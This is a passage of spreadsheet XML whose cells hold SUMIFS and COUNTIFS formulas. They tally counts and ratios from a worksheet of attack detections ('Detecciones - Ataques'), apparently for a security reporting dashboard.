        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>0</v>
      </c>
      <c r="CE61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>4</v>
      </c>
      <c r="CG61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>0</v>
      </c>
      <c r="CH61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>1</v>
      </c>
      <c r="CI61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>0</v>
      </c>
      <c r="CJ61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>13</v>
      </c>
      <c r="CL61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>162</v>
      </c>
      <c r="CN61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>2</v>
      </c>
      <c r="CP61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>40</v>
      </c>
      <c r="CQ61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>3</v>
      </c>
      <c r="CR61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>0</v>
      </c>
      <c r="CT61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>8</v>
      </c>
      <c r="CU61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>0</v>
      </c>
      <c r="CW61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>11</v>
      </c>
      <c r="CY61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>48</v>
      </c>
      <c r="CZ61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>5</v>
      </c>
      <c r="DE61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>8</v>
      </c>
      <c r="DF61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>474</v>
      </c>
      <c r="DI61" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>5505</v>
      </c>
      <c r="DJ61" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$CR3:$CR139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>15</v>
      </c>
      <c r="DK61" s="271"/>
      <c r="DO61" s="279"/>
      <c r="DP61" s="271"/>
      <c r="DQ61" s="271"/>
      <c r="DR61" s="271"/>
      <c r="DS61" s="271"/>
      <c r="DT61" s="271"/>
      <c r="DU61" s="271"/>
      <c r="DV61" s="271"/>
      <c r="DW61" s="271"/>
      <c r="DX61" s="271"/>
      <c r="DY61" s="271"/>
      <c r="DZ61" s="271"/>
      <c r="EA61" s="271"/>
      <c r="EB61" s="271"/>
      <c r="EC61" s="271"/>
      <c r="ED61" s="280"/>
      <c r="EG61" s="279"/>
      <c r="EH61" s="271"/>
      <c r="EI61" s="358" t="s">
        <v>292</v>
      </c>
      <c r="EJ61" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI40,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S38 &amp; "*")</f>
        <v>0</v>
      </c>
      <c r="EK61" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI40,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S38 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="EL61" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI40,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S38 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="EM61" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI40,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S38 &amp; "*")</f>
        <v>2</v>
      </c>
      <c r="EN61" s="360">
        <f t="shared" si="37"/>
        <v>2</v>
      </c>
      <c r="EO61" s="364"/>
      <c r="EP61" s="456">
        <f t="shared" si="40"/>
        <v>0.06896551724</v>
      </c>
      <c r="EQ61" s="457">
        <f t="shared" si="41"/>
        <v>0.9310344828</v>
      </c>
      <c r="ER61" s="427">
        <f t="shared" si="42"/>
        <v>0.9090909091</v>
      </c>
      <c r="ES61" s="427">
        <f t="shared" si="43"/>
        <v>0.875</v>
      </c>
      <c r="ET61" s="427">
        <f t="shared" si="48"/>
        <v>1</v>
      </c>
      <c r="EU61" s="478"/>
      <c r="EV61" s="358" t="s">
        <v>310</v>
      </c>
      <c r="EW61" s="465">
        <f t="shared" ref="EW61:EZ61" si="55">IF(EJ39=0,"-",EJ60/EJ39)</f>
        <v>0</v>
      </c>
      <c r="EX61" s="465">
        <f t="shared" si="55"/>
        <v>0.5833333333</v>
      </c>
      <c r="EY61" s="465">
        <f t="shared" si="55"/>
        <v>0.5</v>
      </c>
      <c r="EZ61" s="466">
        <f t="shared" si="55"/>
        <v>0.2413793103</v>
      </c>
      <c r="FA61" s="479"/>
      <c r="FM61" s="480"/>
      <c r="FY61" s="422" t="s">
        <v>558</v>
      </c>
      <c r="FZ61" s="454">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY61)+SUMIFS('(B) - Detecciones - Ataques'!$BU$3:$BU$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY61 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY61)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY61 &amp; "*"))</f>
        <v>0.009977827051</v>
      </c>
      <c r="GA61" s="455">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY61)+SUMIFS('(B) - Detecciones - Ataques'!$BV$3:$BV$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY61 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY61)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY61 &amp; "*"))</f>
        <v>0.25</v>
      </c>
      <c r="GC61" s="422" t="s">
        <v>558</v>
      </c>
      <c r="GD61" s="384">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY61)+SUMIFS('(B) - Detecciones - Ataques'!$DK$3:$DK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY61 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY61)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY61 &amp; "*"))</f>
        <v>0.4994456763</v>
      </c>
      <c r="GE61" s="385">
        <f>(SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY61)+SUMIFS('(B) - Detecciones - Ataques'!$DL$3:$DL$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY61 &amp; "*")) / (COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$FY61)+COUNTIFS('(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $FY61 &amp; "*"))</f>
        <v>0.5</v>
      </c>
    </row>
    <row r="62">
      <c r="J62" s="277"/>
      <c r="K62" s="481"/>
      <c r="L62" s="482"/>
      <c r="M62" s="482"/>
      <c r="N62" s="473"/>
      <c r="O62" s="278"/>
      <c r="Q62" s="271"/>
      <c r="R62" s="352" t="s">
        <v>2528</v>
      </c>
      <c r="S62" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,S27) + SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; S27 &amp; "*") </f>
        <v>49</v>
      </c>
      <c r="T62" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,T27) + SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; T27 &amp; "*") </f>
        <v>0</v>
      </c>
      <c r="U62" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,U27) + SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; U27 &amp; "*") </f>
        <v>762</v>
      </c>
      <c r="V62" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,V27) + SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; V27 &amp; "*") </f>
        <v>88</v>
      </c>
      <c r="W62" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,W27) + SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; W27 &amp; "*") </f>
        <v>26</v>
      </c>
      <c r="X62" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,X27) + SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; X27 &amp; "*") </f>
        <v>15</v>
      </c>
      <c r="Y62" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>823</v>
      </c>
      <c r="Z62" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>4704366</v>
      </c>
      <c r="AA62" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>557</v>
      </c>
      <c r="AB62" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>284</v>
      </c>
      <c r="AC62" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>66</v>
      </c>
      <c r="AD62" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>27</v>
      </c>
      <c r="AE62" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>83</v>
      </c>
      <c r="AF62" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>524</v>
      </c>
      <c r="AG62" s="271"/>
      <c r="AH62" s="352" t="s">
        <v>2528</v>
      </c>
      <c r="AI62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>32</v>
      </c>
      <c r="AJ62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>16</v>
      </c>
      <c r="AL62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>0</v>
      </c>
      <c r="AN62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>494</v>
      </c>
      <c r="AR62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>248</v>
      </c>
      <c r="AS62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>4</v>
      </c>
      <c r="AU62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>12</v>
      </c>
      <c r="AV62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>4</v>
      </c>
      <c r="AW62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>54</v>
      </c>
      <c r="AY62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>8</v>
      </c>
      <c r="BA62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>26</v>
      </c>
      <c r="BB62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>1</v>
      </c>
      <c r="BD62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE62" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$EH3:$EH139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>4</v>
      </c>
